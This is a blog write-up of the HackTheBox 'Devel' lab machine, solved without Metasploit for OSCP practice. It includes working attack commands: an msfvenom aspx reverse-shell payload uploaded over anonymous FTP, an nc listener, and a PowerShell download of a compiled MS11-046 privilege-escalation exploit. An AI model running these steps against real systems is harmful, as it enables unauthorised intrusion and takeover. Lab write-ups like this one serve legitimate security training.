Chris
Posted on May 27, 2020
Devel HackTheBox Write up
Hello Again! My name is 0xHuey and I will be sharing my HackTheBox walk-through without Metasploit as I prepare for the GIAC GPEN and OSCP. For those that didn't read my previous post, Metasploit is an extremely powerful pentesting tool that automates a lot of the task I will be doing manually. My goal here is to learn how these tools are actually run so that I can become a better infosec enthusiast. So with that said, Lets Begin!!!
Difficulty level: Easy-ish
30mins no water break and some googling
I start off with running a general Nmap Scan to see the services running and for the ports.
Some background on what I am doing here.
-sV = version detection scan
-sC = runs default scripts
-v = verbose
-Pn = checks to see if the host is alive
-p- = scans all ports
-A = detailed information on scripts
-T4 = speed things up
So from the top, we see an open FTP server with looks to allow anonymous logins. Next we can see that there is a site there, because port 80 is open with http. Nmap also gives us their guess on the type of machine that it is currently running which is a Windows 8.
Being that there is a potential website I will try to see what is there. Go to the 10.10.10.5:80 site. We should be greeted with an Internet Information Services landing page. This is a Microsoft web server. If we do some further reading it looks like IIS7 shipped to windows vista and windows server 2008.
Besides this landing page I don't really see much else. So I right-click and select inspect source. After looking at the page though I also don't really see much here.
I decide to run dirb on the site to check to see if there are any hidden publicly available web pages. Do the following from your linux machine.
dirb http://10.10.10.5/
After sometime I am able to get some results from the scan but after going to the locations from my browser I am greeted with a "403 - Forbidden: Access is denied." window :-(
So my next avenue is to try the FTP Server I found. Using the anonymous login with a random password. It doesn't really matter what you type in. But for this walk-through lets stick with the following anonymous:anonymous. To invoke the ftp do the following ftp 10.10.10.5.
So once you are in run the Ls -al to list the contents of your remote directory.
Being that I am able to get into this file and see that the iisstart.htm was apart of what I found earlier. Let me see if I can upload a file to the FTP and display it on a page.
On my linux machine I am going to run the following commands cat > huey.txt and I am going to type Hello
By the time that you've created this txt file the FTP Server will have kicked you out. So don't worry and just log back in with the creds from earlier. Now after getting access, you will need to use the put command to place the file in the FTP Server. So it will be put Huey.txt or whatever you call your file. Be sure that you are in the correct file path when you log into the Server. So if you've saved the txt file to your desktop you will be in that path on your Server. So it would be /root/Desktop then login to your FTP...
After running the put command you will need to Ls -al to see if the file is actually in there.
Here is where I got a little hung and I had to do a little bit of trial/error. After doing some googling I found that Aspnet_Client is apart of the ASP.NET framework that either runs with the ASP or ASPX depending on when it was pushed.
MSFvenom is a great resource to create payloads on the fly to get access to your victim machine.
For more detailed reading on MSFvenom, check out the Offensive-Security page for a quick run down.
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
I found the following script that I am going to use to generate a payload. Type in the following in your correct download path msfvenom -p windows/shell_reverse_tcp LHOST=Your IP LPORT=5555 -f aspx > huey.aspx
The goal of this payload is to achieve an reverse shell back to my machine giving me further access.
Now go back to the FTP Server and put this file in there just like the other dummy txt file.
Bring up another window and run the nc -lvp 5555 command to start listening for the shell. As you can see from the screenshot, I tried some asp files but I had little luck in gaining access.
Okay, so here is where it gets interesting. You created a new webpage for the site and will need to go to that page to execute the exploit. Type in 10.10.10.5/yourfile.aspx
Now if you go back to the listener, you should see a catch.
This is fantastic! But something is off when we run the whoami command. You will see that you do not have administrative privileges.
So if you've ever used Metasploit you know that after getting a shell on a victim machine you can run the getuid command and you will privsec very easily. But if you are not using this tool then things can get a little harder.
So while I am in the box I run the sysinfo command to see what I am really dealing and confirm a few things. What you can see that its a Microsoft Windows 7 Enterprise Machine.
I go back to google and start looking for a privsec exploit.
I come across the following exploit that should allow me to conduct a Privsec on the victim machine.
If you scroll down on the page it provides clear instructions on how to compile it on the victim machine
Make sure to run i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32 this command from your linux machine when compiling it.
Now run a python web server from your Linux machine. This can be used on the fly to share files/data between machines.
Please do the following **python -m SimpleHTTPServer 9005.
I will now upload that code to my victim machine by using the following command with powershell
powershell -c "(new-object System.Net.WebClient).DownloadFile('hxxp://Your IP:9005/40564.exe', 'c:\root\Downloads\40564.exe')"
Now we check the download files to see if its in there.
Once I confirmed that its in there I will compile the code by running the 40564.exe command.
Now re-try the whoami command to check your privileges.
Boom we are in!
Posted on May 27, 2020
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.